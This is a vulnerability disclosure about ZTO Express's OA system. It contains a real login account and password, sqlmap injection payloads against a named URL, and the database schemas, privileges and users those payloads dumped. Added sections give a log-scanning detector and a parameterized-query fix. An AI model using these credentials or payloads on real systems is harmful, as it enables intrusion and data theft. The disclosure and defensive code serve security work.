2015-11-02: Details have been reported to the vendor and are awaiting processing
2015-11-02: Vendor has confirmed; details are disclosed to the vendor only
2015-11-12: Details disclosed to core white hats and relevant domain experts
2015-11-22: Details disclosed to regular white hats
2015-12-02: Details disclosed to intern white hats
2015-12-17: Details disclosed to the public
Backend weak password + SQL injection
https://sso.zt-express.com
Account: 18758251755  Password: zto888888
Injection point:
http://oa.zt-express.com/OA/InfoCenter/NobillInfo/showbig.aspx?method=&billnumber=716665&sign=nobillinfo
sqlmap identified the following injection points with a total of 274 HTTP(s) requests:
---
Parameter: billnumber (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: method=&billnumber=716665 AND 3621=3621&sign=nobillinfo

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: method=&billnumber=716665 AND 8035=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8035=8035) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)&sign=nobillinfo

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: method=&billnumber=716665 AND 3606=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&sign=nobillinfo

    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: method=&billnumber=-2252 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(112)||CHR(113)||CHR(113)||CHR(111)||CHR(69)||CHR(102)||CHR(76)||CHR(88)||CHR(99)||CHR(119)||CHR(69)||CHR(121)||CHR(77)||CHR(113)||CHR(107)||CHR(122)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &sign=nobillinfo
---
[20:53:48] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[20:53:48] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[20:53:48] [INFO] fetching database (schema) names
[20:53:48] [INFO] the SQL query used returns 7 entries
[20:53:48] [INFO] retrieved: CTXSYS
[20:53:49] [INFO] retrieved: EXFSYS
[20:53:49] [INFO] retrieved: MDSYS
[20:53:49] [INFO] retrieved: NEWZTOOA
[20:53:50] [INFO] retrieved: OLAPSYS
[20:53:50] [INFO] retrieved: SYS
[20:53:50] [INFO] retrieved: SYSTEM
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] NEWZTOOA
[*] OLAPSYS
[*] SYS
[*] SYSTEM

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: CONSIGNMENTID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 9874=9874 AND 'XlcM'='XlcM

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND 2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle

database management system users privileges:
[*] NEWZTOOA [15]:
    privilege: ADMINISTER DATABASE TRIGGER
    privilege: CREATE DATABASE LINK
    privilege: CREATE JOB
    privilege: CREATE PROCEDURE
    privilege: CREATE PUBLIC SYNONYM
    privilege: CREATE SEQUENCE
    privilege: CREATE SESSION
    privilege: CREATE TABLE
    privilege: CREATE TRIGGER
    privilege: CREATE TYPE
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DEBUG ANY PROCEDURE
    privilege: DEBUG CONNECT SESSION
    privilege: EXECUTE ANY PROCEDURE

Database: SYSTEM
[8 tables]
+----------------------+
| DEF$_TEMP$LOB        |
| HELP                 |
| MVIEW$_ADV_INDEX     |
| MVIEW$_ADV_OWB       |
| MVIEW$_ADV_PARTITION |
| OL$                  |
| OL$HINTS             |
| OL$NODES             |
+----------------------+

Database: NEWZTOOA
[119 tables]
+-------------------------------+
| AA                            |
| DR$CONTENT_IDX$I              |
| DR$CONTENT_IDX$R              |
| TAB_A                         |
| TAB_ADDRESS_DISTRICT          |
| TAB_ADDRESS_ZIPCODE           |
| TAB_CENTER_RATES              |
| TAB_GUARD_PIC                 |
| TAB_NO_PAYBQ                  |
| TAB_PROVINCE_TEMP             |
| TAB_SITE_MONTHCOUNT           |
| TAB_TAOBAO_AREA               |
| TAB_TAOBAO_COMPLAINT          |
| TAB_TAOBAO_GS                 |
| TAB_TAOBAO_RATE               |
| TAB_TAOBAO_SPEED              |
| TAB_TEST1                     |
| TAB_ZTOA_AIRPORTCODE          |
| TAB_ZTOA_AMERCE               |
| TAB_ZTOA_AMERCETWO            |
| TAB_ZTOA_ARBITRATION          |
| TAB_ZTOA_ARBITRATIONAPPEAL    |
| TAB_ZTOA_ARBITRATIONDISP      |
| TAB_ZTOA_ARBITRATIONDISPSITE  |
| TAB_ZTOA_ARBITRATIONMAKEKNOWN |
| TAB_ZTOA_ARBITRATIONSITE      |
| TAB_ZTOA_ARBITRATIONSORT      |
| TAB_ZTOA_ARBITRATIONTYPE      |
| TAB_ZTOA_ASSET_APPLY          |
| TAB_ZTOA_ASSET_APPLY_TRACK    |
| TAB_ZTOA_ASSET_DICTIONARY     |
| TAB_ZTOA_ASSET_NOTES          |
| TAB_ZTOA_ASSET_VENDOR         |
| TAB_ZTOA_BREAKBILL            |
| TAB_ZTOA_BUSLINES             |
| TAB_ZTOA_BUSNAME              |
| TAB_ZTOA_CAHIERDATA           |
| TAB_ZTOA_COMMENTON            |
| TAB_ZTOA_CONSIGNMENT          |
| TAB_ZTOA_CONSIGNMENTINFO      |
| TAB_ZTOA_COURSEWARE           |
| TAB_ZTOA_CUSTOMER             |
| TAB_ZTOA_DATAINFO             |
| TAB_ZTOA_DATASORT             |
| TAB_ZTOA_DIGLOG               |
| TAB_ZTOA_DISPOSEBOOK          |
| TAB_ZTOA_DISPOSESITE          |
| TAB_ZTOA_EMPLOYEE             |
| TAB_ZTOA_FINANCE_LIST         |
| TAB_ZTOA_FINANCE_TYPE         |
| TAB_ZTOA_FLIGHTS              |
| TAB_ZTOA_FUNCTIONMODULE       |
| TAB_ZTOA_GUESTBOOK            |
| TAB_ZTOA_HRBASICINFO          |
| TAB_ZTOA_HRDUTY               |
| TAB_ZTOA_HYPOLINER            |
| TAB_ZTOA_HYPOLINERDATA        |
| TAB_ZTOA_ITEQUIPMENT          |
| TAB_ZTOA_ITREGISTER           |
| TAB_ZTOA_ITSTORAGE            |
| TAB_ZTOA_ITWORK               |
| TAB_ZTOA_K8HELP               |
| TAB_ZTOA_LEAVEBEHINDDATA      |
| TAB_ZTOA_LOGINPAGE            |
| TAB_ZTOA_MAINLINER            |
| TAB_ZTOA_MAINLINERDATA        |
| TAB_ZTOA_MOTIF                |
| TAB_ZTOA_MOTIFCHILD           |
| TAB_ZTOA_NEWSDEPARTMENT       |
| TAB_ZTOA_NEWSSORT             |
| TAB_ZTOA_NOBILL               |
| TAB_ZTOA_OLDSCANGUN           |
| TAB_ZTOA_ONDUTY               |
| TAB_ZTOA_PAISONGFEI           |
| TAB_ZTOA_PINGIP               |
| TAB_ZTOA_PINGLIST             |
| TAB_ZTOA_POSTCODE             |
| TAB_ZTOA_POST_REPORT          |
| TAB_ZTOA_PROVINCELINER        |
| TAB_ZTOA_PROVINCELINERDATA    |
| TAB_ZTOA_PUCHA                |
| TAB_ZTOA_PUCHA_BAK            |
| TAB_ZTOA_RELATINGPOSTCODE     |
| TAB_ZTOA_REOPRTSITE           |
| TAB_ZTOA_REPORTCHILD          |
| TAB_ZTOA_ROLEFUNCTION         |
| TAB_ZTOA_ROLES                |
| TAB_ZTOA_SITEBOOK             |
| TAB_ZTOA_SITEBOOKBACK         |
| TAB_ZTOA_SITEMAP              |
| TAB_ZTOA_SITEPROVINCE         |
| TAB_ZTOA_SITEVISUALIZE        |
| TAB_ZTOA_SQLTOCSV             |
| TAB_ZTOA_SUFFRAGE             |
| TAB_ZTOA_SUPERVISE            |
| TAB_ZTOA_TASK                 |
| TAB_ZTOA_TASK_ADDED           |
| TAB_ZTOA_TASK_FILE            |
| TAB_ZTOA_TASK_USER            |
| TAB_ZTOA_TRANSFERFEE          |
| TAB_ZTOA_USERPHONE            |
| TAB_ZTOA_USERSITEIT           |
| TAB_ZTOA_USERTEL              |
| TAB_ZTOA_USERVALIDATE         |
| TAB_ZTOA_WEBLOG               |
| TAB_ZTOA_WORKLOG              |
| TAB_ZTOA_YIYUN1               |
| TAB_ZTOA_YIYUN2               |
| TAB_ZTOA_YZTJYB               |
| TAB_ZTOA_ZHIFUBAO             |
| TAB_ZTOA_ZTBEST               |
| TAB_ZTOOA_IPMANAGE            |
| TAB_ZTWEB_BILLSEARCHLOG       |
| TAB_ZTWEB_CITY                |
| TAB_ZTWEB_EXAMINEE            |
| TAB_ZTWEB_JOB                 |
| TAB_ZTWEB_PROVINCE            |
| TAB_ZTWEB_SITE2               |
| TAB_ZTWEB_SLIDE               |
+-------------------------------+

Database: NEWZTOOA
[197 tables]
+-------------------------------+
| AA                            |
| AAAA                          |
| BASEITEMS                     |
| DR$CONTENT_IDX$I              |
| DR$CONTENT_IDX$K              |
| DR$CONTENT_IDX$N              |
| DR$CONTENT_IDX$R              |
| TAB_A                         |
| TAB_ADDRESS_DISTRICT          |
| TAB_ADDRESS_ZIPCODE           |
| TAB_CENTER_INFO               |
| TAB_CENTER_RATES              |
| TAB_COMMENT_INFO              |
| TAB_COMMENT_LOG               |
| TAB_GUARD_PIC                 |
| TAB_NO_PAYBQ                  |
| TAB_PROVINCE_TEMP             |
| TAB_SITE_MONTHCOUNT           |
| TAB_TAOBAO_AREA               |
| TAB_TAOBAO_COMPLAINT          |
| TAB_TAOBAO_GS                 |
| TAB_TAOBAO_RATE               |
| TAB_TAOBAO_SPEED              |
| TAB_TEST                      |
| TAB_TEST1                     |
| TAB_TREE                      |
| TAB_VOTE_EMPLOYEE             |
| TAB_VOTE_EMPLOYEE2014         |
| TAB_ZTOA_AIRPORTCODE          |
| TAB_ZTOA_AMERCE               |
| TAB_ZTOA_AMERCETWO            |
| TAB_ZTOA_APPEARANCE           |
| TAB_ZTOA_ARBITRATION          |
| TAB_ZTOA_ARBITRATIONAPPEAL    |
| TAB_ZTOA_ARBITRATIONDISP      |
| TAB_ZTOA_ARBITRATIONDISPSITE  |
| TAB_ZTOA_ARBITRATIONDUTYTYPE  |
| TAB_ZTOA_ARBITRATIONMAKEKNOWN |
| TAB_ZTOA_ARBITRATIONSITE      |
| TAB_ZTOA_ARBITRATIONSORT      |
| TAB_ZTOA_ARBITRATIONTYPE      |
| TAB_ZTOA_ASSET_APPLY          |
| TAB_ZTOA_ASSET_APPLY_TRACK    |
| TAB_ZTOA_ASSET_DICTIONARY     |
| TAB_ZTOA_ASSET_NOTES          |
| TAB_ZTOA_ASSET_VENDOR         |
| TAB_ZTOA_BALE                 |
| TAB_ZTOA_BASESITE             |
| TAB_ZTOA_BREAKBILL            |
| TAB_ZTOA_BUSLINES             |
| TAB_ZTOA_BUSNAME              |
| TAB_ZTOA_CAHIERDATA           |
| TAB_ZTOA_CARDFEES             |
| TAB_ZTOA_CARDGS               |
| TAB_ZTOA_COMMENTON            |
| TAB_ZTOA_CONSIGNMENT          |
| TAB_ZTOA_CONSIGNMENTINFO      |
| TAB_ZTOA_CONTRABAND           |
| TAB_ZTOA_COURSELECMAIN        |
| TAB_ZTOA_COURSETYPE           |
| TAB_ZTOA_COURSEWARE           |
| TAB_ZTOA_COURSEWARENEW        |
| TAB_ZTOA_CUSTOMER             |
| TAB_ZTOA_DATAINFO             |
| TAB_ZTOA_DATASORT             |
| TAB_ZTOA_DIGLOG               |
| TAB_ZTOA_DISPOSEBOOK          |
| TAB_ZTOA_DISPOSESITE          |
| TAB_ZTOA_DISPOSESITETWO       |
| TAB_ZTOA_EMPLOYEE             |
| TAB_ZTOA_EXPEDITEDATA         |
| TAB_ZTOA_FAREINFO             |
| TAB_ZTOA_FINANCE_LIST         |
| TAB_ZTOA_FINANCE_TYPE         |
| TAB_ZTOA_FLIGHTS              |
| TAB_ZTOA_FUNCTIONMODULE       |
| TAB_ZTOA_FUNCTIONMODULEBACK   |
| TAB_ZTOA_GUESTBOOK            |
| TAB_ZTOA_HRBASICINFO          |
| TAB_ZTOA_HRDUTY               |
| TAB_ZTOA_HRZHU                |
| TAB_ZTOA_HRZI                 |
| TAB_ZTOA_HYPOLINER            |
| TAB_ZTOA_HYPOLINERDATA        |
| TAB_ZTOA_IMAGESTYPE           |
| TAB_ZTOA_INVESTIGATE          |
| TAB_ZTOA_ITBUEQUIPMENT        |
| TAB_ZTOA_ITDELGOLD            |
| TAB_ZTOA_ITEQUIPMENT          |
| TAB_ZTOA_ITPROCESS            |
| TAB_ZTOA_ITPROCESS_LIST       |
| TAB_ZTOA_ITREGISTER           |
| TAB_ZTOA_ITSTORAGE            |
| TAB_ZTOA_ITWORK               |
| TAB_ZTOA_ITWORKLOG            |
| TAB_ZTOA_K8HELP               |
| TAB_ZTOA_LEAVEBEHINDDATA      |
| TAB_ZTOA_LECTURER             |
| TAB_ZTOA_LOGINPAGE            |
| TAB_ZTOA_MAINLINER            |
| TAB_ZTOA_MAINLINERDATA        |
| TAB_ZTOA_MOTIF                |
| TAB_ZTOA_MOTIFCHILD           |
| TAB_ZTOA_NETMAP               |
| TAB_ZTOA_NEWS                 |
| TAB_ZTOA_NEWSCOMMENTON        |
| TAB_ZTOA_NEWSDEPARTMENT       |
| TAB_ZTOA_NEWSSORT             |
| TAB_ZTOA_NOBILL               |
| TAB_ZTOA_NOINAREA             |
| TAB_ZTOA_OLDSCANGUN           |
| TAB_ZTOA_ONDUTY               |
| TAB_ZTOA_PAISONGFEI           |
| TAB_ZTOA_PEER                 |
| TAB_ZTOA_PINGIP               |
| TAB_ZTOA_PINGLIST             |
| TAB_ZTOA_POSTCODE             |
| TAB_ZTOA_POST_REPORT          |
| TAB_ZTOA_PROVINCELINER        |
| TAB_ZTOA_PROVINCELINERDATA    |
| TAB_ZTOA_PUCHA                |
| TAB_ZTOA_PUCHA_BAK            |
| TAB_ZTOA_QHSOURCEINFO         |
| TAB_ZTOA_QHSOURCETYPE         |
| TAB_ZTOA_RELATINGPOSTCODE     |
| TAB_ZTOA_REOPRTSITE           |
| TAB_ZTOA_REPORTCHILD          |
| TAB_ZTOA_REPORTVIOL           |
| TAB_ZTOA_ROLEFUNCTION         |
| TAB_ZTOA_ROLEFUNCTIONBACK     |
| TAB_ZTOA_ROLES                |
| TAB_ZTOA_SITEBOOK             |
| TAB_ZTOA_SITEBOOKBACK         |
| TAB_ZTOA_SITEBOOKTWO          |
| TAB_ZTOA_SITECENTER           |
| TAB_ZTOA_SITEEMPLOYEE         |
| TAB_ZTOA_SITEINFO             |
| TAB_ZTOA_SITEMAC              |
| TAB_ZTOA_SITEMAP              |
| TAB_ZTOA_SITEPROVINCE         |
| TAB_ZTOA_SITESTATISTICS       |
| TAB_ZTOA_SITEVISUALIZE        |
| TAB_ZTOA_SPACE                |
| TAB_ZTOA_SQLTOCSV             |
| TAB_ZTOA_SUFFRAGE             |
| TAB_ZTOA_SUM_GJ               |
| TAB_ZTOA_SUM_ZTO              |
| TAB_ZTOA_SUPERVISE            |
| TAB_ZTOA_SUPERVISETWO         |
| TAB_ZTOA_TASK                 |
| TAB_ZTOA_TASK_ADDED           |
| TAB_ZTOA_TASK_FILE            |
| TAB_ZTOA_TASK_USER            |
| TAB_ZTOA_TRANSFERCENTERCAR    |
| TAB_ZTOA_TRANSFERFEE          |
| TAB_ZTOA_UNLOADDATA           |
| TAB_ZTOA_USEROWNERPROVINCE    |
| TAB_ZTOA_USERPHONE            |
| TAB_ZTOA_USERSITEIT           |
| TAB_ZTOA_USERTEL              |
| TAB_ZTOA_USERVALIDATE         |
| TAB_ZTOA_VEHICLE              |
| TAB_ZTOA_VIOLATIONFINES       |
| TAB_ZTOA_VIOLATIONPACKAGE     |
| TAB_ZTOA_VIOLATIONPACKAGETYPE |
| TAB_ZTOA_WEBLOG               |
| TAB_ZTOA_WORKLOG              |
| TAB_ZTOA_WORKLOG_ADD          |
| TAB_ZTOA_YIYUN1               |
| TAB_ZTOA_YIYUN2               |
| TAB_ZTOA_YIYUN3_YUNJIA        |
| TAB_ZTOA_YZTJ22               |
| TAB_ZTOA_YZTJ23               |
| TAB_ZTOA_YZTJ24               |
| TAB_ZTOA_YZTJJ22              |
| TAB_ZTOA_YZTJJ23              |
| TAB_ZTOA_YZTJYB               |
| TAB_ZTOA_ZHIFUBAO             |
| TAB_ZTOA_ZTBEST               |
| TAB_ZTOOA_IPMANAGE            |
| TAB_ZTOPDA_PROVIDE            |
| TAB_ZTWEB_BILLSEARCHLOG       |
| TAB_ZTWEB_CITY                |
| TAB_ZTWEB_EXAMINEE            |
| TAB_ZTWEB_JOB                 |
| TAB_ZTWEB_NEWS                |
| TAB_ZTWEB_PROVINCE            |
| TAB_ZTWEB_SITE                |
| TAB_ZTWEB_SITE2               |
| TAB_ZTWEB_SLIDE               |
| TOAD_PLAN_TABLE               |
| ZHONGTONG_ZHONGCAI_CHUFA      |
| ZHONGTONG_ZHONGCAI_RIZHI      |
| ZHONGTONG_ZHONGCAI_SHENQING   |
| ZHONGTONG_ZHONGCAI_SHENSU     |
| ZHONGTONG_ZHONGCAI_WANGDIAN   |
| ZHONGTONG_ZHONGCAI_XIADA      |
+-------------------------------+

[21:57:22] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[21:57:22] [INFO] fetching database users
[21:57:23] [INFO] the SQL query used returns 29 entries
[21:57:23] [INFO] retrieved: READONLY
[21:57:23] [INFO] retrieved: WEIXIN
[21:57:23] [INFO] retrieved: OGG_SYNC
[21:57:23] [INFO] retrieved: CRM
[21:57:25] [INFO] retrieved: DBMS
[21:57:25] [INFO] retrieved: WULIAO
[21:57:25] [INFO] retrieved: ZHONGCAI
[21:57:25] [INFO] retrieved: NEWZTOOA
[21:57:26] [INFO] retrieved: ZTOWEB
[21:57:26] [INFO] retrieved: MDDATA
[21:57:26] [INFO] retrieved: MDSYS
[21:57:27] [INFO] retrieved: SI_INFORMTN_SCHEMA
[21:57:27] [INFO] retrieved: ORDPLUGINS
[21:57:27] [INFO] retrieved: ORDSYS
[21:57:28] [INFO] retrieved: OLAPSYS
[21:57:28] [INFO] retrieved: WDOA
[21:57:28] [INFO] retrieved: ANONYMOUS
[21:57:28] [INFO] retrieved: XDB
[21:57:28] [INFO] retrieved: CTXSYS
[21:57:29] [INFO] retrieved: EXFSYS
[21:57:29] [INFO] retrieved: WMSYS
[21:57:29] [INFO] retrieved: ORACLE_OCM
[21:57:29] [INFO] retrieved: DBSNMP
[21:57:29] [INFO] retrieved: TSMSYS
[21:57:32] [INFO] retrieved: DMSYS
[21:57:32] [INFO] retrieved: DIP
[21:57:32] [INFO] retrieved: OUTLN
[21:57:33] [INFO] retrieved: SYSTEM
[21:57:33] [INFO] retrieved: SYS
database management system users [29]:
[*] ANONYMOUS
[*] CRM
[*] CTXSYS
[*] DBMS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] NEWZTOOA
[*] OGG_SYNC
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] READONLY
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WDOA
[*] WEIXIN
[*] WMSYS
[*] WULIAO
[*] XDB
[*] ZHONGCAI
[*] ZTOWEB
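The sqlmap output above leaves a recognisable trail in the web server's request log: numeric tautologies (AND 3621=3621), UNION ALL SELECT with NULL padding, XMLType() error probes, CHR()||CHR() string obfuscation and the ALL_USERS self-join heavy query. The following Python scanner is an added example and not part of the original report: it flags those patterns in IIS W3C log lines and tallies hits per client. The log lines are constructed for the example (they only mirror the kinds of payloads shown above), the field order is assumed, and the expectation that billnumber is always numeric is an assumption about the endpoint, not something the report states.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed IIS W3C log lines (not from the vendor). The query strings mirror the
# kinds of payloads sqlmap sent against the billnumber parameter in the report.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2015-11-01 20:53:47 10.0.0.5 GET /OA/InfoCenter/NobillInfo/showbig.aspx method=&billnumber=716665&sign=nobillinfo 203.0.113.7 200
2015-11-01 20:53:48 10.0.0.5 GET /OA/InfoCenter/NobillInfo/showbig.aspx method=&billnumber=716665+AND+3621%3D3621&sign=nobillinfo 203.0.113.7 200
2015-11-01 20:53:49 10.0.0.5 GET /OA/InfoCenter/NobillInfo/showbig.aspx method=&billnumber=716665+AND+8035%3D(SELECT+UPPER(XMLType(CHR(60)%7C%7CCHR(58)))+FROM+DUAL)&sign=nobillinfo 203.0.113.7 500
2015-11-01 20:53:50 10.0.0.5 GET /OA/InfoCenter/NobillInfo/showbig.aspx method=&billnumber=-2252+UNION+ALL+SELECT+NULL,CHR(113)%7C%7CCHR(120),NULL+FROM+DUAL--+&sign=nobillinfo 203.0.113.7 200
2015-11-01 20:53:51 10.0.0.5 GET /OA/InfoCenter/NobillInfo/showbig.aspx method=&billnumber=716665+AND+3606%3D(SELECT+COUNT(*)+FROM+ALL_USERS+T1,ALL_USERS+T2)&sign=nobillinfo 203.0.113.7 200
2015-11-01 20:54:02 10.0.0.5 GET /OA/InfoCenter/NobillInfo/showbig.aspx method=&billnumber=716666&sign=nobillinfo 198.51.100.9 200
"""

# Patterns matching the injection techniques that appear in the report's sqlmap output.
# Each one is checked against the URL-decoded value of every query parameter.
INDICATORS = {
    "boolean-tautology": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "union-select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "oracle-xmltype-error": re.compile(r"\bXMLType\s*\(", re.I),
    "chr-concat-obfuscation": re.compile(r"\bCHR\s*\(\s*\d+\s*\)\s*\|\|", re.I),
    "oracle-heavy-query": re.compile(r"\bALL_USERS\b.*\bALL_USERS\b", re.I | re.S),
    "oracle-dual": re.compile(r"\bFROM\s+DUAL\b", re.I),
}

# Assumption for the example: billnumber is a numeric waybill id, so any other
# shape is suspicious on its own, independent of the pattern matches.
NUMERIC_PARAMS = {"billnumber"}


def parse_iis_line(line):
    """Parse one W3C-format line with the field order declared in SAMPLE_LOG."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != 8:
        return None
    date, time, _server_ip, method, stem, query, client_ip, status = parts
    return {"time": f"{date} {time}", "method": method, "stem": stem,
            "query": query, "client": client_ip, "status": int(status)}


def classify_request(entry):
    """Return the (parameter, indicator) pairs that fire for one request."""
    hits = []
    # IIS logs the raw query string; parse_qs decodes %XX and '+' the way the app would.
    params = parse_qs(entry["query"], keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if name in NUMERIC_PARAMS and value and not value.isdigit():
                hits.append((name, "non-numeric-value"))
            for label, pattern in INDICATORS.items():
                if pattern.search(value):
                    hits.append((name, label))
    return hits


def scan_log(text):
    """Scan a whole log; return the flagged entries and a per-client hit count."""
    findings = []
    per_client = Counter()
    for line in text.splitlines():
        entry = parse_iis_line(line)
        if entry is None:
            continue
        hits = classify_request(entry)
        if hits:
            findings.append({**entry, "hits": hits})
            per_client[entry["client"]] += 1
    return findings, per_client


if __name__ == "__main__":
    found, clients = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["client"], f["status"], sorted(set(label for _, label in f["hits"])))
    print("flagged requests per client:", dict(clients))
```

The per-client counter is the part worth alerting on: one tautology probe may be noise, but a burst of several distinct indicator classes from one address against one parameter inside a few seconds is the signature of an automated scanner rather than a typo.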
Suggested fix: change the password and filter SQL special characters.
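One caveat on the character-filter part of that fix: the boolean payload recorded above for billnumber (716665 AND 3621=3621) contains no quote, semicolon or comment marker, so stripping "special characters" leaves it untouched in a numeric context. What closes the hole is type validation plus a bound parameter. The demonstration below is an added example, not the vendor's ASP.NET/Oracle code; it uses Python's built-in sqlite3 so it runs offline, and the nobill table and its columns are constructed for the example.

```python
import re
import sqlite3

# Boolean probe recorded in the report for the billnumber parameter.
# Note that it contains no quote, semicolon or comment sequence.
REPORTED_PAYLOAD = "716665 AND 3621=3621"


def setup_db():
    """Constructed in-memory stand-in for the waybill lookup table (not the vendor's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE nobill (billnumber INTEGER PRIMARY KEY, site TEXT)")
    conn.executemany("INSERT INTO nobill VALUES (?, ?)",
                     [(716665, "site-A"), (716666, "site-B"), (716667, "site-C")])
    return conn


def lookup_vulnerable(conn, billnumber):
    """'Before' form: the request value is spliced straight into the SQL text."""
    sql = "SELECT billnumber, site FROM nobill WHERE billnumber = " + billnumber
    return conn.execute(sql).fetchall()


def strip_sql_specials(value):
    """The character filter the report proposes, as it is commonly implemented."""
    return re.sub(r"['\";]", "", value)


def is_valid_billnumber(value):
    """Waybill numbers are plain positive integers (assumption for the example)."""
    return value.isdigit()


def lookup_parameterized(conn, billnumber):
    """'After' form: validate the type, then bind the value instead of concatenating."""
    if not is_valid_billnumber(billnumber):
        raise ValueError("billnumber must be a positive integer")
    return conn.execute("SELECT billnumber, site FROM nobill WHERE billnumber = ?",
                        (int(billnumber),)).fetchall()


if __name__ == "__main__":
    conn = setup_db()
    # Tautology: the row still comes back, so the injected condition was evaluated.
    print(lookup_vulnerable(conn, REPORTED_PAYLOAD))
    # Contradiction: no row. The difference is what blind injection observes.
    print(lookup_vulnerable(conn, "716665 AND 3621=3622"))
    # The character filter removes nothing from this payload.
    print(lookup_vulnerable(conn, strip_sql_specials(REPORTED_PAYLOAD)))
    # Validation plus binding rejects it before any SQL is built.
    try:
        lookup_parameterized(conn, REPORTED_PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

The same structure applies to the CONSIGNMENTID parameter, which takes a hex token rather than an integer: validate it against its expected alphabet and length, then bind it, rather than trying to enumerate the characters an attacker might use.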
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-02 15:52
Vendor reply: Thanks to the white hat for the hard work. This system has many injection points and will be taken offline soon.